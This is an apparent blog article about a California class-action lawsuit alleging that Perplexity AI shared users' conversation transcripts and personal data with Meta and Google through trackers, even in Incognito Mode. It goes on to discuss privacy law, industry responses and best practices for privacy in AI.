Meta and Google Targeted in Perplexity AI Lawsuit Over Secret Data Sharing Practices
- Chen Ling

- Apr 4
- 5 min read

The rapid rise of artificial intelligence has reshaped how we interact with technology, offering convenience, automation, and unprecedented insights. Yet, the surge in AI adoption has also intensified scrutiny over privacy and ethical use. Perplexity AI, a prominent AI-powered search engine and conversational platform, now finds itself at the center of multiple high-profile lawsuits, raising critical questions about data security, user trust, and corporate accountability.
The Allegations: Incognito Mode as a Sham
A proposed class-action lawsuit filed in California highlights alarming allegations. According to the complaint, Perplexity AI allegedly shared sensitive user data with Meta and Google, even when users activated the platform’s “Incognito Mode.” The lawsuit claims:
Trackers embedded on the homepage allow full access to AI conversations.
Data shared includes IP addresses, email addresses, geolocation, and entire conversation transcripts.
Sensitive topics, such as legal advice, health issues, investment strategies, and family finances, were allegedly transmitted.
These practices allegedly violate California privacy laws, including the Electronic Communications Privacy Act and the state’s wiretapping statutes.
As the lawsuit asserts, “No reasonable person would have expected that Perplexity would share complete transcripts of their conversations … with companies like Meta and Google.”
This issue is not isolated. The complaint notes that data collection occurs regardless of subscription status and persists even when users believe they are protected by privacy-focused features.
Legal and Regulatory Context
Privacy concerns in AI are intensifying globally. The Perplexity case echoes prior controversies around “private” browsing modes, including Google Chrome’s Incognito and Safari’s Private Browsing. Historically, such features were intended to protect local device histories, but high-profile lawsuits have exposed gaps in actual privacy protection.
Regulators and courts are increasingly emphasizing transparency and informed consent. Companies failing to implement robust privacy measures may face:
Class-action lawsuits with potential multi-million-dollar settlements.
Injunctions restricting AI functionality, as seen in prior Perplexity cases regarding Comet AI browser scraping.
Increased regulatory oversight under laws such as the California Consumer Privacy Act (CCPA) and the European Union’s GDPR.
Legal experts warn that the stakes for AI developers are higher than ever. “Transparency is no longer optional. AI companies must clearly articulate how user data is collected, stored, and shared,” notes cybersecurity analyst Dr. Amelia Chen.
Implications for Users and Privacy
From a user perspective, these allegations highlight the limitations of relying on default privacy features. Users interacting with AI platforms often share highly personal information under the assumption of confidentiality. The Perplexity lawsuits illustrate several key concerns:
False Sense of Security: Users trust features like Incognito mode, yet these protections may be incomplete.
Data Exploitation: Sensitive personal information, including health, financial, and legal data, could be monetized without explicit consent.
Behavioral Tracking: AI platforms can create detailed profiles of user behavior, raising ethical concerns regarding targeted advertising and decision-making manipulation.
This raises broader questions for AI adoption: How much can users trust the systems they interact with daily, and what safeguards are necessary to ensure privacy without hindering innovation?
AI, Corporate Responsibility, and Ethical Design
The Perplexity allegations underscore a pressing need for ethical AI design. Companies developing AI systems face a dual mandate: leveraging data to improve services while protecting user rights. Best practices emerging across the industry include:
Data Minimization: Collect only what is essential for functionality.
End-to-End Encryption: Secure sensitive communications against unauthorized access.
Transparent User Consent: Clearly inform users how their data will be used and shared.
Independent Audits: Conduct third-party privacy audits to validate compliance.
Ethical AI frameworks are increasingly influencing regulatory standards. The IEEE and the OECD have published guidelines emphasizing accountability, transparency, and respect for human rights in AI design.
The Broader Market Impact
The Perplexity case has implications beyond the company itself, affecting AI platforms, advertisers, and enterprise adoption. Potential consequences include:
Investor Scrutiny: Privacy lawsuits may influence investment decisions and valuations.
Regulatory Pressure: Legal precedents could tighten rules for AI data usage, particularly in the U.S. and EU markets.
Consumer Confidence: User trust is critical for platform growth, and allegations of data misuse may hinder adoption.
A recent survey by TechInsights indicates that 72% of AI users are concerned about how platforms handle sensitive data. Perceived misuse could accelerate the shift toward privacy-focused AI alternatives.

Technical Analysis of Alleged Data Sharing
According to the filings, the mechanisms involved in the alleged data sharing were highly sophisticated:
Tracking Scripts: Installed automatically upon landing on Perplexity’s homepage, these scripts allegedly transmitted full conversation transcripts.
Persistent Identifiers: IP addresses and email accounts may have been linked to conversation histories.
Commercial Exploitation: The data allegedly enabled targeted advertising, potentially influencing financial and health decisions.
These practices, if proven, illustrate how AI systems can inadvertently—or deliberately—expose highly sensitive user information. Cybersecurity experts emphasize that even anonymized data can often be re-identified through correlation techniques.
Industry Response and Corporate Statements
Perplexity, Google, and Meta have responded differently. Perplexity’s Chief Communications Officer, Jesse Dwyer, stated the company had not been served with the lawsuit and could not verify the allegations. Meta acknowledged policies restricting sensitive data sharing but emphasized responsibility lies with advertisers. Google has not publicly commented.
Experts suggest that corporate transparency and proactive engagement with regulators can mitigate reputational damage. As AI platforms continue to evolve, user trust may become a critical differentiator for market success.
The Role of Human Oversight in AI
These legal and ethical concerns reinforce the importance of human oversight. While AI can automate tasks and analyze vast datasets, humans must guide critical decisions, including:
Privacy policy implementation and compliance.
Risk assessment for data collection and monetization.
Ethical auditing and bias mitigation.
Industry leaders highlight that AI’s potential will be constrained unless companies integrate robust ethical governance and human accountability.
Emerging Solutions and Best Practices
To address privacy concerns, AI companies are exploring several solutions:
Zero-Knowledge AI Protocols: Systems where servers cannot access user data, only the outputs needed to provide functionality.
Local AI Processing: Executing AI models on user devices rather than cloud servers, reducing data exposure.
Differential Privacy: Mathematical techniques to ensure that outputs do not compromise individual user information.
Regulatory Sandbox Programs: Pilot testing AI systems under regulatory oversight before full public release.
Adopting such strategies may restore trust while maintaining the capabilities that make AI platforms valuable.
Privacy, Trust, and the Future of AI
The Perplexity AI lawsuits illuminate the complex intersection of AI innovation, user privacy, and corporate accountability. As AI becomes integral to daily life, companies must prioritize transparent practices, ethical data usage, and human oversight. Privacy breaches, whether real or perceived, have the potential to erode public trust and hinder adoption.
For organizations and users alike, the message is clear: trust in AI is earned, not assumed. Companies like Perplexity, Google, and Meta are now navigating an environment where ethical responsibility and technical excellence are inseparable.
The expert team at 1950.ai, led by Dr. Shahid Masood, emphasizes that the AI revolution must balance innovation with ethical governance, ensuring that technological advancement does not come at the expense of fundamental human rights. Users must remain vigilant, and developers must prioritize privacy as a core design principle.
Follow insights from Dr. Shahid Masood and the 1950.ai team to understand emerging AI regulations, privacy safeguards, and the future of responsible artificial intelligence.
Further Reading / External References
Bloomberg, “Perplexity AI Machine Accused of Sharing Data With Meta, Google” | https://www.bloomberg.com/news/articles/2026-04-01/perplexity-ai-machine-accused-of-sharing-data-with-meta-google
Tom’s Guide, “Perplexity is Being Sued for Allegedly Sharing User Data With Meta and Google” | https://www.tomsguide.com/ai/perplexity-is-being-sued-for-allegedly-sharing-user-data-with-meta-and-google-heres-what-we-know-so-far
Inc., Chloe Aiello, “Lawsuit Alleges Perplexity is Sharing Data With Tech Giants” | https://www.inc.com/chloe-aiello/lawsuit-alleges-perplexity-is-sharing-data-with-tech-giants/91326739




Comments